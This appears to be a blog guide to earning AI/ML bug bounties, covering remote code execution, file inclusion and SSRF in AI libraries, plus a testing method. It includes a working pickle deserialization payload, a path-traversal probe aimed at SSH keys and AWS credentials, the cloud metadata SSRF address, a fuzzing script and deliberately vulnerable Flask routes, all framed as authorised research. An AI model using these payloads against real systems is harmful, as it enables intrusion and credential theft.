
AI Bug Bounty Guide 2024

A complete guide to earning money by hacking AI platforms in 2024

Bug bounty hunting has long been an established source of income in the cybersecurity industry. As insecure AI/ML-based applications enter the market in 2024, new bounty programs with low-hanging fruit are opening up.

In this post, I will outline the best bug bounty platform, the top vulnerabilities to search for, and a simple methodology to find your first bug.




Contents

The Best Bug Bounty Platform

Top Vulnerabilities

1 - Remote Code Execution

2 - File Inclusion

3 - Server-Side Request Forgery

High-Level Testing Methodology

Final Thoughts - The Future


The Best Bug Bounty Platform


While HackerOne and BugCrowd are good generic options, the best AI/ML-specific bug bounty platform is Huntr. This platform offers bounties of up to $3000 and has 250+ repositories in scope, allowing researchers to earn a lucrative salary by submitting bugs.

It’s worth noting that Huntr focuses on hacking the applications and coding libraries used in AI/ML operations, as opposed to the models themselves. For more information on hacking AI models, check out this blog post.

Top Vulnerabilities

Huntr has identified 3 top vulnerabilities to search for when conducting penetration tests against AI/ML apps. These are all easy to find and have a high severity score, providing a good chance of paying out.

1 - Remote Code Execution

Remote Code Execution tends to be an immediate critical-severity vulnerability, as it allows an attacker to gain full control over the target server.

Many AI/ML libraries began life as programmatic interfaces, with APIs and web UIs developed later on. These later-developed components are often misconfigured, allowing attackers to directly execute commands through the web UI.

Additionally, if the app allows users to upload model files, it may insecurely deserialize them and run any code injected inside! This is known as insecure deserialization - you can read my article below to learn more.
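
To make the risk concrete, below is a minimal, self-contained sketch of insecure deserialization using Python's pickle module. The command and file path are placeholders; the point is that merely loading an untrusted "model" file is enough to execute attacker-controlled code.

```python
# Minimal sketch of insecure deserialization: a pickled "model file" can run
# arbitrary code the moment it is loaded. Illustrative only - use an isolated
# environment if you try it.
import pickle


class MaliciousModel:
    # __reduce__ tells pickle how to rebuild the object on load; here it
    # rebuilds it by calling os.system with an attacker-chosen command.
    def __reduce__(self):
        import os
        return (os.system, ("id > /tmp/pwned",))


# Attacker crafts the "model file" and uploads it to the target application.
payload = pickle.dumps(MaliciousModel())

# Vulnerable server-side code: loading the upload executes the command.
pickle.loads(payload)
```

Formats such as safetensors exist precisely to avoid this class of bug, since they store raw tensor data rather than executable objects.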



2 - File Inclusion


File Inclusion may sound harmless, but it often leads to remote code execution and critical impact. Local File Inclusion enables attackers to read sensitive data from the web server, and Remote File Inclusion may let them execute malicious code embedded in files.

AI/ML applications need to support both data and model files, which often end up in several filesystem locations as users perform operations. Since there is no standard location for these files, AI/ML developers may grant users excessive read/write access, paving the way for devastating exploits.
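
As an illustration, here is a hypothetical Flask route for downloading artifacts that suffers from Local File Inclusion. The route and parameter names are assumptions rather than code from any specific project.

```python
# Hypothetical, deliberately vulnerable sketch of an artifact download route.
from flask import Flask, request, send_file

app = Flask(__name__)


@app.route("/artifacts")
def get_artifact():
    # Vulnerable: the user-controlled "path" parameter is concatenated
    # directly, so ?path=../../../../etc/passwd reads arbitrary server files.
    path = request.args.get("path", "")
    return send_file("./artifacts/" + path)
```

A safer version would serve files with flask.send_from_directory, which rejects paths that escape the intended directory.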

3 - Server-Side Request Forgery

SSRF is usually less severe than the two vulnerabilities above, yet it is so common in AI/ML apps that it is a prime candidate to test for. SSRF can be used to exfiltrate sensitive data, crash the target website, or, in specific cases, even achieve remote code execution.

Many AI platforms allow users to upload data in several ways - Amazon S3, HTTP, FTP, and more. Attackers may be able to control where these requests are sent. A common impact is inducing the server to query sensitive internal locations, such as router configuration pages.
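
The sketch below shows the typical shape of an SSRF-prone feature: a hypothetical "import from URL" endpoint that fetches whatever address the user supplies. The route name is an assumption for illustration.

```python
# Hypothetical, deliberately vulnerable "import data from URL" endpoint.
import requests
from flask import Flask, request

app = Flask(__name__)


@app.route("/import")
def import_dataset():
    # Vulnerable: no allow-list, so the URL can point at internal services,
    # e.g. http://169.254.169.254/latest/meta-data/ on a cloud host.
    url = request.args.get("url", "")
    resp = requests.get(url, timeout=5)
    return resp.text
```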

High-Level Testing Methodology


You can get started testing AI/ML applications for vulnerabilities right away. The following high-level methodology was summarized from Huntr’s Tutorial page, which provides more detail for each step.

1. Static Code Analysis

  • Download an AI/ML library from GitHub.

  • Run a Snyk vulnerability scan on the library (free VSCode plugin).

  • Review the Snyk scan report.

  • Filter out non-relevant issues, such as XSS where JSON is returned or path traversals that affect non-user-facing utility scripts.

  • Identify the five files with the highest number of findings.

  • Perform a targeted search for dangerous functions and patterns:

    • eval(

    • exec(

    • subprocess.

    • os.system

    • pickle.dumps

    • pickle.loads

    • shell=True

    • yaml.load
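
A short script can automate this targeted search. The sketch below walks a cloned repository and prints every line containing one of the patterns above; the repository path is a placeholder.

```python
# Rough sketch: grep a cloned repository for dangerous Python patterns.
import os

PATTERNS = ["eval(", "exec(", "subprocess.", "os.system",
            "pickle.dumps", "pickle.loads", "shell=True", "yaml.load"]


def scan(repo_dir="./target-repo"):  # placeholder path
    for root, _dirs, files in os.walk(repo_dir):
        for name in files:
            if not name.endswith(".py"):
                continue
            path = os.path.join(root, name)
            with open(path, errors="ignore") as f:
                for lineno, line in enumerate(f, start=1):
                    if any(p in line for p in PATTERNS):
                        print(f"{path}:{lineno}: {line.strip()}")


if __name__ == "__main__":
    scan()
```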

2. Map Out The Application

  • Check the /docs directory for an OpenAPI specification.

  • If unavailable, use a tool like ChatGPT to generate an API spec based on documentation.

  • Failing that, populate the application with test data and proxy traffic using a Web App Proxy tool.

  • Save and name each unique API request captured in the proxy.

  • Search for URL patterns such as ftp://, s3://, and http:// in API requests, indicating potential SSRF vulnerabilities.
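
If you export the saved requests from your proxy as plain-text files, a few lines of Python can surface these URL patterns for you. The folder name and file format below are assumptions.

```python
# Rough sketch: scan exported proxy requests for URL-style parameters.
import os
import re

URL_SCHEMES = re.compile(r"ftp://|s3://|https?://", re.IGNORECASE)

for root, _dirs, files in os.walk("./saved-requests"):  # placeholder folder
    for name in files:
        path = os.path.join(root, name)
        with open(path, errors="ignore") as f:
            for lineno, line in enumerate(f, start=1):
                if URL_SCHEMES.search(line):
                    print(f"{path}:{lineno}: {line.strip()}")
```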

3. Automatic Testing

  • Perform an active scan on each API request.

  • Monitor each request in a logging tool and document any anomalies, such as unexpected status codes, unusually long responses, or truncated outputs.

4. Manual Testing

  • Inject payloads into each API request using the Big List of Naughty Strings.

  • Use Burp Intruder’s Sniper mode to cycle payloads through each insertion point for comprehensive coverage.

  • Analyze all responses, looking for unusual status codes or variations in response length.
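
Outside Burp, the same idea can be scripted. The sketch below sends each naughty string as a single parameter value and flags responses that deviate from a baseline; the target URL, parameter name, and payload file path are placeholders.

```python
# Rough fuzzing sketch using the Big List of Naughty Strings.
import requests

TARGET = "http://localhost:8000/api/predict"  # placeholder endpoint
PARAM = "model_name"                          # placeholder parameter name

# One payload per line, e.g. the blns.txt file from the BLNS repository.
with open("blns.txt", errors="ignore") as f:
    payloads = [line.rstrip("\n") for line in f if line.strip()]

baseline = requests.get(TARGET, params={PARAM: "test"}, timeout=10)

for payload in payloads:
    resp = requests.get(TARGET, params={PARAM: payload}, timeout=10)
    # Flag deviations from the baseline status code or large swings in
    # response length - both are leads worth investigating manually.
    if (resp.status_code != baseline.status_code
            or abs(len(resp.text) - len(baseline.text)) > 500):
        print(f"{resp.status_code} {len(resp.text):>8} {payload[:40]!r}")
```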

5. Authentication Testing

  • Download the Autorize plugin on Burp Suite.

  • Set up Autorize with a low-privilege user’s authentication token.

  • Navigate the application as a high-privilege user and ensure that access controls are properly enforced.

  • Verify that all privileged requests are restricted and logged correctly in the Autorize interface.
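
The core check that Autorize automates can also be reproduced by hand for a single endpoint: replay a privileged request with a low-privilege token and compare the responses. The endpoint and tokens below are placeholders.

```python
# Rough sketch of a manual broken-access-control check.
import requests

URL = "http://localhost:8000/api/admin/users"  # placeholder privileged endpoint
HIGH_PRIV_TOKEN = "REPLACE_WITH_HIGH_PRIV_TOKEN"
LOW_PRIV_TOKEN = "REPLACE_WITH_LOW_PRIV_TOKEN"

high = requests.get(URL, headers={"Authorization": f"Bearer {HIGH_PRIV_TOKEN}"}, timeout=10)
low = requests.get(URL, headers={"Authorization": f"Bearer {LOW_PRIV_TOKEN}"}, timeout=10)

# If the low-privilege token receives the same successful response as the
# high-privilege one, access control is likely broken for this endpoint.
if low.status_code == 200 and low.text == high.text:
    print("Possible broken access control:", URL)
else:
    print("Access control appears enforced:", low.status_code)
```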


What to Look For:

Remote Code Execution

  • Often results from arbitrary file overwrites but can also occur in cases where user input is improperly executed within a command.

  • Review all instances of user input being placed directly into executable operations for vulnerabilities.

File Inclusion

  • Check API calls used for exporting models or datasets from the AI/ML system.

  • Overwriting critical files, such as .bashrc or SSH credentials, can often result in remote code execution.

  • Also check API calls that import or read models and data files, as they are susceptible to local file inclusion.

  • Look for endpoints that use naming conventions like GetArtifact or get-artifact for opportunities to access sensitive files, such as SSH or cloud keys.
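
A rough probe for this class of bug might look like the sketch below; the endpoint, parameter name, and candidate paths are assumptions and should be adapted to the target's actual API.

```python
# Rough sketch: probe a get-artifact style endpoint for path traversal.
import requests

BASE = "http://localhost:8000/api/get-artifact"  # placeholder endpoint
CANDIDATES = [
    "../../../../etc/passwd",
    "../../../../root/.ssh/id_rsa",
    "../../../../home/ubuntu/.aws/credentials",
]
MARKERS = ["root:", "PRIVATE KEY", "aws_access_key_id"]

for path in CANDIDATES:
    resp = requests.get(BASE, params={"path": path}, timeout=10)
    if resp.status_code == 200 and any(m in resp.text for m in MARKERS):
        print("Possible local file inclusion via:", path)
```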

Server-Side Request Forgery (SSRF)

  • Target API calls that handle data from S3 buckets or accept URLs as input.

  • Exploit these to initiate internal network requests, potentially exposing services or internal metadata at addresses like http://169.254.169.254/latest/meta-data/.

Final Thoughts - The Future


Data scientists are not developers - they often lack the secure coding experience of professional software engineers. Unfortunately, the apps they develop are often full of high-severity bugs reminiscent of web applications 10+ years ago. There is a fantastic opportunity to make money via AI bug bounty programs right now!

As AI/ML apps and their associated bounties become more mainstream, vulnerabilities will be patched, and the risk of these applications being hacked will reduce. However, the impact of exploitation will increase as more organizations integrate such apps into their infrastructure. Learning about AI Security now will position security professionals to handle challenges like these in the future.


